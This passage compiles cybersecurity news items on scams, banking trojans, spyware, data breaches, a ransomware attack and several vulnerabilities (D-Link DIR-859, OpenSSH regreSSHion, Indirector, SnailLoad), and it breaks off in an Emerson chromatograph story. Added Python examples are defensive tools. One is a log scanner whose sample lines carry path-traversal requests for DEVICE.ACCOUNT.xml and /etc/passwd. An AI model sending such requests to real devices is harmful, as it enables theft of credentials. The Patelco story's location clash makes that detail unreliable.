According to the Global State of Scams report by the Global Anti-Scam Alliance, consumers lost over USD 1 trillion globally in 2023. The researchers behind the recent study have shared the following tips to help online shoppers stay safe during the Amazon Prime Day sales:
  • Scrutinize URLs for misspellings or unusual domain extensions.
  • Use strong, unique passwords for your Amazon account.
  • Verify website security by looking for "https://" and the padlock icon.
  • Be wary of requests for excessive personal information.
  • Approach urgent emails with caution and verify their legitimacy.
  • Trust your instincts about deals that seem too good to be true.
  • Use credit cards for better fraud protection when shopping online.
A customer trust report from Amazon in March of this year indicated that over two-thirds of observed scams purported to involve order or account issues. A paraphrased customer quote from the report reads:
“I got a random call from someone who claimed I bought something on Amazon that I hadn’t and they wanted my account information to verify this was an error.”
Amazon maintains a separate email address, reportascam@amazon.com, for customers to report scams. In 2023, the e-commerce giant took down over 40,000 phishing websites and 10,000 phone numbers. Amazon also partners with organizations such as the Better Business Bureau (BBB), the Anti-Phishing Council in Japan, Microsoft and several cross-industry investigative groups to collaborate and add depth to the information collected from customers' scam reports. It is unknown whether Amazon is taking any specific action related to scams that claim association with the Amazon Prime Day event.

Researchers Observe Surge in Use of Mekotio Banking Trojan Against Latin American Financial Systems

Mekotio Banking Trojan Against Latin America

The Mekotio banking trojan has resurfaced as a significant threat to financial institutions and individuals across Latin America. Active since 2015, Mekotio has primarily been used against a persistent set of target countries, including Brazil, Chile, Mexico, Spain and Peru, with the aim of stealing sensitive information such as banking credentials. Mekotio shares similarities with other Latin American banking malware such as Grandoreiro, whose operations were recently disrupted by law enforcement.

Mekotio Infection and Operation

Researchers from Trend Micro noticed an uptick in the use of the Mekotio malware across campaigns. The researchers stated that Mekotio typically infiltrates systems through phishing emails purporting to be communications from tax agencies. These messages often claim the recipient has unpaid tax obligations while embedding malicious ZIP file attachments or links that download and execute the malware on the victim's system. (Image source: trendmicro.com) Once activated, Mekotio gathers system information and establishes a connection with a command-and-control server. The malware performs the following operations on infected systems:
  • Credential theft: Mekotio displays fake pop-ups mimicking legitimate banking sites to trick users into entering their login details.
  • Information gathering: The trojan captures screenshots, logs keystrokes and steals clipboard data.
  • Persistence: Mekotio employs tactics like adding itself to startup programs or creating scheduled tasks to maintain its presence on infected systems.
Several security researchers have investigated previous campaigns involving the use of the Mekotio malware, often noting it as a geolocation-specific Trojan. A threat summary from Microsoft Security Intelligence states, "The Mekotio Trojan evades detection using a malicious DLL that executes using DLL sideloading, since the DLL and executable loading the DLL is dropped in the same folder. The folder is the first location where an executable searches for a loading module to help execute the malicious dropped DLL before reaching the original DLL." The page also notes that victims may be restricted from accessing legitimate banking websites after infection.

Prevention and Mitigation Against Mekotio

The researchers advise maintaining sound security practices to combat threats such as Mekotio. These include:
  • Being skeptical of unsolicited emails and verifying the sender's email address.
  • Avoiding clicking on links and downloading attachments unless absolutely certain of the sender's identity.
  • Verifying sender identity by contacting the sender through known contact details.
  • Using email filters and anti-spam software, and ensuring they are up to date.
  • Reporting phishing attempts to IT and security teams when applicable.
  • Educating employees on security best practices, including phishing and social engineering tactics.
The researchers also shared potential indicators of compromise, including file hashes, C&C server addresses and download URLs. By adhering to these guidelines, maintaining vigilance and scrutinising possible attack indications, organizations and individuals can significantly reduce their risk of falling victim to the Mekotio banking trojan.

Hacker Shares Data Allegedly Stolen From Shopify Breach

Shopify Data Breach

A known threat actor on BreachForums who uses the moniker '888' has shared data allegedly stolen from Shopify in a data breach incident. The data is claimed to consist of personal details, email subscriptions and order-related information of its users. Shopify Inc. is a Canada-based multinational business that offers a proprietary e-commerce platform along with integrations that allow individuals, retailers and other businesses to set up their own online stores or retail point-of-sale websites.

Alleged Shopify Data Breach

The Shopify data breach is claimed to contain 179,873 rows of user information. These records allegedly include Shopify ID, First Name, Last Name, Email, Mobile, Orders Count, Total spent, Email subscriptions, Email subscription dates, SMS subscription, and SMS subscription dates. (Image source: BreachForums) The Cyber Express could not verify the authenticity of these claims, but the threat actor has a high-ranking reputation within the BreachForums community that has earned him the title of 'Kingpin.' The breach could possibly have stemmed from a recent data breach incident impacting Evolve Bank and Trust. Evolve Bank and Trust is a supporting partner of Shopify Balance, a money management integration built into the admin pages of Shopify stores. The bank is also a third-party issuer of Affirm debit cards. (Image source: X.com (@lvdeeaz))

Recent Evolve Bank and Trust Data Breach

Towards the end of June, Evolve Bank confirmed that it had been impacted by a cybersecurity incident claimed by LockBit. The bank disclosed that the stolen data included sensitive personal information such as names, social security numbers (SSNs), dates of birth, and account details, among other data. In an official statement in response to the Evolve data breach, the bank said, “Evolve is currently investigating a cybersecurity incident involving a known cybercriminal organization that appears to have illegally obtained and released on the dark web the data and personal information of some Evolve retail bank customers and financial technology partners’ customers (end users).” Later, the financial firm Affirm Holdings confirmed that it had also been affected by the Evolve Bank and Trust data breach. The firm stated in a security notice on its website, "Affirm is aware of a cybersecurity incident involving Evolve, a third party vendor that serves as an issuing partner on the Affirm Card. We are actively investigating the issue. We will communicate directly with any impacted consumers as we learn more."

Transparent Tribe’s Android Spyware Targets Gamers and Weapons Enthusiasts

Transparent Tribe

A Pakistan-linked hacking group has unleashed an updated version of its Android spyware, expanding its reach to target mobile gamers, weapons enthusiasts and TikTok users, according to cybersecurity researchers. The researchers identified four new malicious Android apps associated with Transparent Tribe, a group suspected of ties to Pakistani state interests. The apps continue the hackers' strategy of embedding spyware into seemingly innocuous video browsing applications.

Evolving Tactics of Transparent Tribe

Transparent Tribe, also known as APT 36, has targeted Indian government and military personnel since at least 2016. The group is known to rely heavily on social engineering to deliver Windows and Android spyware through phishing emails and compromised websites. Researchers from SentinelLabs identified the newly discovered apps masquerading as YouTube or TikTok video players, an app for lewd videos, a mobile gaming portal, and a weapons enthusiast app. When installed, they request extensive permissions to access the device's location, contacts, SMS messages, call logs, camera and microphone. (Images: CapraTube Transparent Tribe; source: sentinelone.com) While the permissions requested are similar to those in the previous campaign, the reduction in permissions suggests the app developers are focused on making CapraRAT a surveillance tool rather than a fully featured backdoor. Researchers noted that the new CapraRAT APK files contained references to Android’s Oreo version (Android 8.0), released in 2017. Previous versions relied on the device running Lollipop (Android 5.1), which was released in 2015 and is less likely to be compatible with modern Android devices. The new CapraRAT packages also contain a minimal new class called WebView, responsible for maintaining compatibility with older versions of Android via the Android Support Library. This update allows the app to run smoothly on modern versions of Android, such as Android 13 and 14. All four newly discovered apps communicate with the same command-and-control server, using either the domain shareboxs[.]net or a hardcoded IP address. This infrastructure has been linked to Transparent Tribe operations since at least 2022.

Researcher Recommendations

Cybersecurity experts recommend that users exercise caution when installing apps, especially those from unofficial sources. Users should critically evaluate requested permissions and be wary of apps that ask for access unrelated to their stated purpose. For example, an app that only displays TikTok videos does not need the ability to send SMS messages, make calls, or record the screen. Organizations dealing with sensitive information should implement mobile device management solutions and educate employees about the risks of installing unauthorized apps. The researchers have advised professionals to treat the use of port 18582 as suspect, along with the other indicators of compromise in their report, such as SHA1 checksums for files used in the campaign and domain/IP network indicators.

Researchers Uncover New ‘Indirector’ CPU Vulnerability in Intel Chips

'Indirector' CPU Vulnerability

Security researchers have identified a novel side-channel attack that can compromise the security of modern Intel CPU variants, including Raptor Lake and Alder Lake. The attack, dubbed Indirector, leverages weaknesses in the Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB) to bypass existing defenses and steal sensitive information from processors. The IBP is a critical hardware component in modern CPUs that predicts the target addresses of indirect branches. Indirect branches are control flow instructions whose target address is computed only at runtime, making them challenging to predict accurately. Attacks using Branch Target Injection (BTI) have been the focus of extensive research by security experts since the discovery of the Spectre and Meltdown attacks in 2018.

Indirector CPU Vulnerability

The Indirector attack developed by University of California San Diego researchers exploits weaknesses in Intel CPUs to launch precise Branch Target Injection (BTI) attacks. Attackers can use a custom tool called the iBranch Locator to locate any indirect branch and then perform precision-targeted IBP and BTB injections to execute speculative code. This allows attackers to steal sensitive information from the processor using a side-channel attack. (Image source: indirector.cpusec.org) This tool enables two high-precision attacks:
  • IBP Injection Attack: Locates and injects arbitrary target addresses into victim IBP entries.
  • BTB Injection Attack: Injects malicious targets into the victim's BTB entry, misleading it through BTB prediction.
These attacks can potentially bypass existing defenses and compromise system security across various scenarios, including cross-process and cross-privilege situations. The paper states that while Intel already offers several mitigations to protect the BTB and IBP from different types of target injection attacks, such as Indirect Branch Restricted Speculation (IBRS), Single Thread Indirect Branch Predictors (STIBP), and Indirect Branch Predictor Barrier (IBPB), these defenses were found inadequate and did not always live up to their advertised goals. The researchers expressed surprise at discovering potential attack surfaces despite the implementation of these measures. The research paper makes three main contributions:
  • The paper presents the first major analysis of the Indirect Branch Predictor and its interaction with the Branch Target Buffer in the recent Intel processor families. The paper details the size, structure, and precise indexing and tagging hash functions.
  • The paper analyzes mitigation mechanisms (IBRS, STIBP, and IBPB) on Intel CPUs designed to protect against BTB and IBP target injection attacks.
  • The paper demonstrates the use of the iBranch Locator as an efficient tool capable of locating any indirect branch within the IBP without requiring prior data on the branch. The paper highlights that by using this tool, attackers can successfully break address space layout randomization.

Intel Indirector Mitigations

For Intel processors, the researchers recommend more aggressive use of the Indirect Branch Predictor Barrier (IBPB) and suggest incorporating more fine-grained BPU isolation across security domains in future CPU designs. Further possible mitigations include hardening the Branch Prediction Unit (BPU) design through more complex tags, encryption, and randomization. The researchers disclosed their findings to Intel in February 2024 and stated that Intel had informed other affected hardware and software vendors about the vulnerability. The discoveries underscore the importance of ongoing scrutiny and analysis of hardware components and the need for chip manufacturers to continually improve their designs to stay ahead of potential threats. The authors thanked anonymous reviewers for helpful suggestions on the research paper.

Patelco Credit Union Hit by Ransomware Attack, Disrupting Services for Nearly 500,000 Members

Patelco Credit Union

Patelco Credit Union, one of the oldest and largest credit unions in the U.S., fell victim to a ransomware attack on June 29, 2024, forcing the institution to shut down most of its day-to-day banking systems. The attack has affected nearly half a million members across the Bay Area and Northern California, leaving them without access to crucial financial services. The Dublin, Ohio-based credit union disclosed details of the security incident through social media and email communications from President and CEO Erin Mendez. While initial details were scarce, Patelco later confirmed the nature of the attack and its widespread impact on member services.

Scope Of Patelco Credit Union Attack

The ransomware attack has crippled Patelco's online banking platform, mobile app, and call center operations after staff shut down these systems to contain the attack. Members are currently unable to perform electronic transactions such as transfers (including Zelle), direct deposits, balance inquiries, and online bill payments. (Image source: X.com (@PatelcoPays)) Debit and credit card transactions are functioning in a limited capacity, while ATM cash withdrawals and deposits remain available at Patelco and shared branch ATMs. The credit union's President and CEO, Erin Mendez, issued a statement on social media Saturday morning, announcing that services were unavailable due to a "serious security incident." An email was sent to members later that day, revealing that the incident was a ransomware attack, confirming that the credit union had shut down its systems to contain and remediate the issue.

Patelco Credit Union Response and Recovery Efforts

In the email shared with Patelco members, Mendez apologized for the inconvenience and assured members that the credit union was working around the clock with third-party cybersecurity professionals to assess the situation and restore services. The credit union has warned members to expect longer than normal wait times at branches and through customer service channels. While the full extent of the attack's impact remains unclear, Patelco has assured members that they can still access cash from ATMs. The credit union has also set up a dedicated webpage for ongoing communications about the incident and system functionality updates. The latest update on the security incident from the dedicated webpage states:
Please know that our team and third-party partners are working around the clock to get back up and running. We are committed to providing transparent and frequent updates to best of our ability as well as the best possible service that we can, given the disruption. We sincerely apologize for the inconvenience that this cyber attack has caused for our members. We anticipate longer than normal wait times and truly appreciate your patience and support during this difficult time.
The website also provides details on the availability of locations, categorizing them as available, limited functionality, and unavailable. (Image: Availability of Patelco Credit Union locations; source: www.patelco.org/securityupdate) The site disclosed that there was no evidence that account information such as account number/member number, or online banking credentials such as mobile and online banking User IDs or passwords, were affected.

Researchers Observe Hackers Exploiting Vulnerability in End-of-Life D-Link DIR-859 Routers

D-Link DIR-859 Router Vulnerability

D-Link DIR-859 WiFi routers have been found to have a path traversal vulnerability that allows for information disclosure. This vulnerability, identified as CVE-2024-0769, affects all hardware revisions and firmware versions of the DIR-859. The DIR-859 model has reached its end-of-life status and will not be receiving any further updates from D-Link.

D-Link DIR-859 Router Vulnerability

The vulnerability allows attackers to access and retrieve sensitive information from the router's configuration files. The vulnerability occurs in the /htdocs/cgibin directory on the DIR-859 router, where HTTP requests are processed by a single binary. By sending a specially crafted HTTP POST request to the router's web interface, an attacker can bypass security measures and gain unauthorized access to user data. Researchers from security firm GreyNoise observed a variation of the exploit in the wild, which targets a specific configuration file containing user account information. The discovered exploit scripts leverage the vulnerability to retrieve the DEVICE.ACCOUNT.xml file, which contains usernames, passwords, group information, and descriptions for all users of the device.
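An added detection example (not from GreyNoise or D-Link): it scans a constructed request log for requests to the DIR-859 cgibin handler that reference DEVICE.ACCOUNT.xml or carry path traversal sequences, decoding repeated percent-encoding first so that obfuscated variants are not missed. The log line format, the hypothetical `file=` parameter and every sample line are constructed assumptions; only the cgibin handler, the POST method, the DEVICE.ACCOUNT.xml target and the traversal come from the description above.

```python
"""Flag request-log entries that look like attempts to read DEVICE.ACCOUNT.xml
from a D-Link DIR-859 through its cgibin handler (CVE-2024-0769).

Added example, not from the GreyNoise write-up or D-Link. The log line format
(<client> <method> <path> <status> "<body>"), the 'file=' parameter and every
sample line are constructed; only the cgibin handler, the POST method, the
DEVICE.ACCOUNT.xml target and path traversal come from the description above.
"""
import re
from urllib.parse import unquote

TARGET_FILE = "device.account.xml"
TRAVERSAL = re.compile(r"\.\.[/\\]")
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "(.*)"$')


def decode_fully(text):
    """Strip repeated percent-encoding so %252e%252e%252f is seen as ../."""
    previous = None
    while previous != text:
        previous, text = text, unquote(text)
    return text


def parse_line(line):
    """Parse one constructed log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    client, method, path, status, body = m.groups()
    return {"client": client, "method": method.upper(), "path": path,
            "status": int(status), "body": body}


def classify(req):
    """Return the reasons a request looks like CVE-2024-0769 activity (empty if benign)."""
    reasons = []
    path, body = decode_fully(req["path"]), decode_fully(req["body"])
    if "/cgibin" not in path.lower():
        return reasons                      # the flaw lives in the cgibin handler
    blob = (path + " " + body).lower()
    if TARGET_FILE in blob:
        reasons.append("references DEVICE.ACCOUNT.xml (user names and passwords)")
    if TRAVERSAL.search(blob):
        reasons.append("path traversal sequence present after decoding")
    if reasons and req["method"] == "POST":
        reasons.append("POST to the cgibin handler, the shape seen in the wild")
    if reasons and req["status"] == 200:
        reasons.append("server returned 200: treat as a possible successful disclosure")
    return reasons


def scan(log_text):
    """Return [(client, path, reasons)] for every suspicious line in the log."""
    alerts = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        reasons = classify(req)
        if reasons:
            alerts.append((req["client"], req["path"], reasons))
    return alerts


# Constructed sample log (RFC 5737 documentation addresses); not real traffic.
CONSTRUCTED_LOG = """\
198.51.100.23 GET /index.html 200 ""
192.0.2.9 POST /cgibin 200 "action=login&user=admin"
203.0.113.7 POST /cgibin 200 "file=../DEVICE.ACCOUNT.xml"
203.0.113.7 POST /cgibin 403 "file=%2e%2e%2f%2e%2e%2fDEVICE.ACCOUNT.xml"
203.0.113.8 GET /cgibin?file=%252e%252e%252fetc%252fpasswd 200 ""
"""

if __name__ == "__main__":
    for client, path, reasons in scan(CONSTRUCTED_LOG):
        print(client, path)
        for reason in reasons:
            print("   -", reason)
```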

Protection Against D-Link Vulnerability

D-Link strongly recommends that users of DIR-859 routers retire and replace their devices with newer, supported models. The company advises against continued use of end-of-life products due to the potential security risks involved. The discovery of this vulnerability has significant implications for owners of D-Link DIR-859 routers:
  • Permanent vulnerability: As the router model is no longer supported, there will be no official patch to address this security flaw.
  • Long-term risk: The disclosed information remains valuable to attackers for the entire lifespan of the device, as long as it remains internet-facing.
  • Potential for further exploitation: The vulnerability could be used in combination with other, yet unknown, vulnerabilities to gain full control over the affected devices.
For U.S. customers unable to immediately replace their routers, it is crucial to take additional security measures, such as disabling remote management features, using strong and unique passwords for all accounts, regularly monitoring router logs for suspicious activity, and considering a separate virtual private network (VPN) for added security. D-Link's official security advisory stated:
D-Link strongly recommends that this product be retired and cautions that any further use of this product may be a risk to devices connected to it. If US consumers continue to use these devices against D-Link's recommendation, please make sure the device has the most recent firmware, make sure you frequently update the device's unique password to access its web-configuration, and always have WIFI encryption enabled with a unique password.
Researchers stated that while the intended use of the information disclosed from the routers is unknown, it remains valuable to attackers for the lifetime of the device as long as the device remains connected to the internet.

OpenSSH ‘regreSSHion’ Vulnerability Exposes Millions of Servers to Remote Attack

OpenSSH 'regreSSHion' Vulnerability

Researchers have identified a significant remote code execution (RCE) vulnerability that could affect millions of OpenSSH servers. The vulnerability - dubbed 'regreSSHion' and recorded as CVE-2024-6387 - allows for unauthenticated root-level remote code execution, posing a serious security risk. The vulnerability affects OpenSSH server software running on Linux systems that use the GNU C Library. It stems from a race condition in how OpenSSH handles certain signals during connection attempts.

regreSSHion Vulnerability and Its Impact

Researchers from Qualys discovered that the vulnerability stems from a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability is remotely exploitable, making it a significant threat to Linux systems. The potential impact of this vulnerability is severe, as it could lead to a complete system takeover, installation of malware, data manipulation, and the creation of backdoors for persistent access. An attacker with root access could bypass critical security mechanisms such as firewalls, intrusion detection systems, and logging mechanisms, making it even more challenging to detect and respond to an attack. The regreSSHion vulnerability impacts a broad range of OpenSSH versions, from the earliest releases up to, but not including, version 9.8p1. However, its effects vary depending upon the version:
  • Versions before 4.4p1 are vulnerable unless patched for earlier, related flaws.
  • Versions 4.4p1 to 8.5p1 are not affected due to previous security fixes.
  • Versions 8.5p1 to 9.8p1 are vulnerable due to an accidental removal of critical code.
However, servers on OpenBSD systems remain unaffected thanks to a secure mechanism implemented in 2001. The researchers stated that they had developed a working exploit for the vulnerability and had disclosed it to the OpenSSH team to assist in remediation efforts. While the researchers do not release exploits as a matter of firm policy, they believe that other researchers would be able to replicate the results.

Mitigating Risk to OpenSSH Servers

The vulnerability's discovery highlights the importance of ongoing security audits and regression testing in software development. The flaw is a reintroduction of a bug first patched in 2006, demonstrating how even well-maintained projects can inadvertently reopen old security holes. Organizations running vulnerable OpenSSH versions should take immediate action:
  • Apply patches: Update to OpenSSH 9.8p1 or apply vendor-provided fixes for older versions.
  • Limit access: Restrict SSH connections through network controls to reduce attack surface.
  • Segment networks: Isolate critical systems to prevent lateral movement if a breach occurs.
  • Monitor activity: Deploy intrusion detection systems to alert on potential exploitation attempts.
  • Assess exposure: Use asset management tools to identify vulnerable systems across the enterprise.
For systems that cannot be immediately patched, the researchers recommend setting the LoginGraceTime parameter to 0 in the SSH server configuration file to mitigate the remote code execution risk. However, the researchers warn that this could instead leave the server vulnerable to denial-of-service attacks.
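An added example (not from Qualys or the OpenSSH project) that applies the version ranges listed above to an sshd banner and checks whether an sshd_config applies the LoginGraceTime 0 workaround. It assumes that a banner without a 'pN' portable suffix is a native OpenBSD build, and it cannot see distribution backports, so its output is a prompt to check the vendor advisory rather than a verdict.

```python
"""Classify an OpenSSH server banner against the CVE-2024-6387 (regreSSHion)
version ranges and check sshd_config for the LoginGraceTime 0 workaround.

Added example; the version ranges follow the summary above, the OpenBSD
detection (no 'pN' portable suffix) is an assumption, and the sample banner
and config text are constructed.
"""
import re

# OpenSSH_<major>.<minor>[.<patch>][p<portable>], e.g. OpenSSH_9.6p1 or OpenSSH_9.7 (OpenBSD)
BANNER_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)(?:\.(\d+))?(p(\d+))?")


def parse_version(banner):
    """Return (major, minor, portable_or_None) from an SSH banner, or None if not OpenSSH."""
    m = BANNER_RE.search(banner)
    if m is None:
        return None
    major, minor, _patch, portable_tag, portable = m.groups()
    return (int(major), int(minor), int(portable) if portable_tag else None)


def assess(banner):
    """Map the banner version onto the affected ranges described in the article.

    Caveat: distributions backport fixes without changing the version string,
    so 'vulnerable' here means 'check the vendor advisory', not a confirmed finding.
    """
    parsed = parse_version(banner)
    if parsed is None:
        return "unknown: not an OpenSSH banner"
    major, minor, portable = parsed
    if portable is None:
        # Assumption: only the native OpenBSD build ships without the portable 'pN' suffix.
        return "not affected: native OpenBSD build (unaffected since 2001)"
    version = (major, minor)
    if version < (4, 4):
        return "vulnerable unless patched for the earlier related flaw (before 4.4p1)"
    if version < (8, 5):
        return "not affected (4.4p1 up to 8.5p1)"
    if version < (9, 8):
        return "vulnerable: fix regressed (8.5p1 up to 9.8p1)"
    return "fixed (9.8p1 or later)"


def _seconds(value):
    """Parse an sshd time value such as 120, 30s, 2m or 1h into seconds."""
    m = re.fullmatch(r"(\d+)([smh]?)", value.lower())
    if m is None:
        raise ValueError("unsupported time value: %s" % value)
    number, unit = int(m.group(1)), m.group(2)
    return number * {"": 1, "s": 1, "m": 60, "h": 3600}[unit]


def login_grace_time(sshd_config):
    """Effective LoginGraceTime in seconds; sshd uses the first occurrence, default 120."""
    for raw in sshd_config.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"(?i)logingracetime\s+(\S+)", line)
        if m:
            return _seconds(m.group(1))
    return 120


def report(banner, sshd_config):
    """Combine the version assessment with the workaround status for one host."""
    grace = login_grace_time(sshd_config)
    return {
        "banner": banner.strip(),
        "assessment": assess(banner),
        "login_grace_time": grace,
        # 0 closes the race window but, as the article warns, trades RCE for DoS exposure.
        "workaround_applied": grace == 0,
    }


if __name__ == "__main__":
    # Constructed sample input, not from a real host.
    SAMPLE_BANNER = "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13"
    SAMPLE_CONFIG = "# sshd_config\nPort 22\nLoginGraceTime 0\nLoginGraceTime 2m  # ignored: first value wins\n"
    for key, value in report(SAMPLE_BANNER, SAMPLE_CONFIG).items():
        print("%s: %s" % (key, value))
```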

National Australia Bank Raises Alarm About Cyber Threats to Major Banks

National Australia Bank

An executive from National Australia Bank says the country's four major banks are under constant attack, with threat actors launching a barrage of attacks every minute of every day. According to Chris Sheehan, National Australia Bank's executive for group investigations, "every bank is being attacked all the time." The aim of these attacks is to steal sensitive information and money from unsuspecting customers. The four major banks in Australia include ANZ Bank, Commonwealth Bank, National Australia Bank (NAB), and Westpac. These banks are officially recognized to be the largest within the country and are prohibited from mergers or acquisitions between each other as part of the "Four pillars policy." This relentless barrage of cyber assaults targets not only the banks' systems but also their customers, leaving millions potentially vulnerable to sophisticated scams and financial theft. Threat actors may employ various forms of attacks, including the distribution of malicious code, security breaches, and denial of service campaigns, making it a daunting task for banks to stay ahead.

National Australia Bank Executive Raises Alarm

The cyber attacks on Australian banks are not isolated incidents but a stream of continuous attempts to breach security, deny services, and steal sensitive information. Sheehan describes the situation as "asymmetrical warfare," with threats ranging from amateur hackers to highly organized transnational crime groups and even malicious nation-state actors. Sheehan stated:
From, being colloquial, Larry the loser, in the basement at home that's having a bit of a chop away at the laptop and trying to steal money from people or hack into a system, all the way to highly sophisticated, ruthless and resilient transnational organised crime groups and they're the ones that are driving 90 per cent of the scams that are hitting Australian victims.
Criminals perceive online attacks as lower risk than traditional bank robberies, with the potential for much higher rewards. The extent of the problem is staggering, with Australians losing an estimated $3 billion annually to cyber scams. The official's statements come shortly after customers observed the bank's own website being down for several hours. NAB's website temporarily informed visitors that its services were not working and directed them to use the NAB app or telephone banking instead.
[Image: National Australia Bank Down. Source: X.com (@Tzarimas)]
While the bank's services appear to have been restored, it is unknown whether the downtime was the result of an attack or routine maintenance. Several customers expressed frustration over not being alerted to the downtime via email or text, and raised concerns over pending transactions.
[Image: National Australia Bank Down Twitter. Source: X.com (@NAB)]

Defending Australian Banks

In response to this relentless assault, Australian banks have ramped up their defenses. The banks are working hard to stay ahead of the scammers, with NAB employing a dedicated call center and operations team to fight fraud and scams. The team consists of 350-400 people working around the clock and is available 24/7. Banks have also implemented new policies, such as eliminating hyperlinks in official communications with customers, to help distinguish legitimate messages from scams. Despite these efforts, the battle against cyber crime remains an uphill struggle. Once a customer falls victim to a scam and initiates a payment, recovery of funds is often impossible. Chris Sheehan advises, "if it looks or sounds too good to be true, or if someone's applying pressure to you that you're going to miss out on something, or you're going to suffer a penalty, if you don't make that payment, they are massive red flags." The Australian Banking Association acknowledges the severity of the situation, describing it as a "scams war." The banks are also implementing extra safeguards to prevent money from being lost to international criminal gangs. Amidst this persistent threat, it is crucial for customers of the major banks to remain vigilant against the tactics used by these scammers.

SnailLoad Allows Attackers to Trace Visited Websites By Measuring Network Latency

SnailLoad Exploit Network Traffic

Researchers from Austria's Graz University of Technology have uncovered a novel side-channel attack called SnailLoad that exploits network latency to infer user activity. SnailLoad is a non-invasive attack technique that could allow attackers to gather information about websites visited or videos watched by victims without needing direct access to their network traffic.

How The SnailLoad Exploit Works

SnailLoad takes advantage of the bandwidth bottleneck present in most internet connections. When a user's device communicates with a server, the last mile of the connection is typically slower than the server's connection. An attacker can measure delays in their own packets sent to the victim to deduce when the victim's connection is busy.
[Image: The SnailLoad Exploit. Source: snailload.com]
The attack masquerades as a download of a file or any website component (such as a style sheet, a font, an image or an advertisement). The attacking server sends out the file at a snail's pace in order to monitor the connection latency over an extended period of time. The researchers chose the name 'SnailLoad' because, "apart from being slow, SnailLoad, just like a snail, leaves traces and is a little bit creepy." The attack requires no JavaScript or code execution on the victim's system. It simply involves the victim loading content from an attacker-controlled server that sends data at an extremely slow rate. By monitoring latency over time, the attacker can correlate patterns with specific online activities. The researchers have shared the conditions required to recreate the SnailLoad attack:
  • Victim communicates with the attack server.
  • The server the victim communicates with has a faster Internet connection than the victim's last-mile connection.
  • The attacker's packets sent to the victim are delayed if the last mile is busy.
  • Attacker infers website visited or video watched by victim through side-channel attack.
In the related user study detailed in the SnailLoad research paper, the researchers approached local undergraduate and graduate students who volunteered to run a measurement script that employs the SnailLoad attack technique. The researchers took steps to ensure that no personal information was exposed at any point. Furthermore, the researchers planned to destroy the collected traces after the paper was published and offered students the option to request the deletion of their traces, or their exclusion from the paper's results, at any point. The researchers reported the attack technique to Google on March 9 under the responsible disclosure section of their paper, with Google acknowledging the severity of the issue. The tech giant also stated that it was investigating possible server-side mitigations for YouTube. The researchers shared a working proof of concept on GitHub along with instructions and an online demo.

SnailLoad Implications and Mitigation

In testing, SnailLoad was able to achieve up to 98% accuracy in identifying YouTube videos watched by victims. It also showed 62.8% accuracy in fingerprinting websites from the top 100 most visited list. While not currently observed in the wild, SnailLoad could potentially affect most internet connections. Mitigation is challenging, as the root cause stems from fundamental bandwidth differences in network infrastructure. The researchers stated that while adding random noise to the network can reduce the accuracy of the attack, it could impact performance and cause inconvenience to users. As online privacy concerns grow, SnailLoad highlights how even encrypted traffic could potentially be exploited to leak information through subtle timing differences. Further research could be required to develop effective countermeasures against this new class of remote side-channel attacks.
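A toy queueing model of the mechanism described in "How The SnailLoad Exploit Works" and of the random-noise mitigation discussed above, added here as an illustration and not the researchers' code: the link capacity, the two video burst profiles, the probe size and the jitter levels are all constructed, and the point is only that queued victim traffic shows up as probe delay, and that measurement jitter degrades matching.

```python
import random

CAPACITY = 100     # last-mile capacity in KB per 10 ms slot (constructed)
PROBE_KB = 1       # the attacker's slow download sends one small packet per slot
SLOTS = 120        # length of each trace in slots


def burst_profile(period, burst_len, burst_kb):
    """Constructed video-streaming profile: every `period` slots the player
    refills its buffer with `burst_len` busy slots of `burst_kb` each."""
    return [burst_kb if (t % period) < burst_len else 0 for t in range(SLOTS)]


# Two hypothetical videos with different buffering rhythms; these stand in
# for the per-video traffic fingerprints the researchers match against.
PROFILES = {
    "video_a": burst_profile(period=30, burst_len=6, burst_kb=400),
    "video_b": burst_profile(period=20, burst_len=3, burst_kb=600),
}


def probe_latency_trace(victim_kb_per_slot):
    """Queueing model of the victim's last mile.

    The server side is assumed to be faster than the last mile, so whatever
    the victim downloads queues in front of the slow download's packets; the
    extra delay seen by those packets (in slots) is backlog over capacity.
    """
    backlog, trace = 0, []
    for victim_kb in victim_kb_per_slot:
        backlog = max(0, backlog + victim_kb + PROBE_KB - CAPACITY)
        trace.append(backlog / CAPACITY)
    return trace


def add_latency_noise(trace, std, rng):
    """Random jitter on the measured latencies: the mitigation the page mentions."""
    return [value + rng.gauss(0.0, std) for value in trace]


def classify(observed, references):
    """Nearest-reference match by squared distance over the whole trace."""
    return min(
        references,
        key=lambda name: sum((o - r) ** 2
                             for o, r in zip(observed, references[name])),
    )


def accuracy(noise_std, trials=200, seed=1):
    """Fraction of trials in which the noisy trace is matched to the right video."""
    rng = random.Random(seed)
    references = {name: probe_latency_trace(p) for name, p in PROFILES.items()}
    hits = 0
    for _ in range(trials):
        truth = rng.choice(sorted(references))
        observed = add_latency_noise(references[truth], noise_std, rng)
        hits += classify(observed, references) == truth
    return hits / trials


if __name__ == "__main__":
    for std in (0.0, 20.0, 200.0):
        print(f"latency jitter std={std:6.1f} slots -> accuracy {accuracy(std):.2f}")
```

Because the match is taken over the whole trace, jitter has to be large relative to the queueing delay before accuracy drops, which is the performance cost the researchers allude to.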

Researchers Uncover Flaws in Widely Used Emerson Rosemount Industrial Gas Chromatographs

Emerson Rosemount Gas Chromatographs 2

Security experts have identified multiple vulnerabilities in widely used industrial gas chromatographs manufactured by Emerson Rosemount. These flaws could potentially allow malicious actors to access sensitive information, disrupt operations and execute unauthorized commands. Gas chromatographs are critical instruments used for analyzing chemical compounds across a range of industries, including environmental facilities, hospitals, and food processing companies. These devices are critical for ensuring the accuracy of gas measurements and the safety of the environment, patients, and consumers.

Flaws in Emerson Rosemount Gas Chromatographs

Operational technology security firm Claroty discovered the vulnerabilities, which include two command injection flaws and two authentication bypass issues. If exploited, these flaws could enable unauthenticated attackers to run arbitrary commands, access sensitive data and gain administrative control.
[Image: Emerson Rosemount Gas Chromatographs. Source: Wikipedia]
[Image: Emulated system. Source: claroty.com]
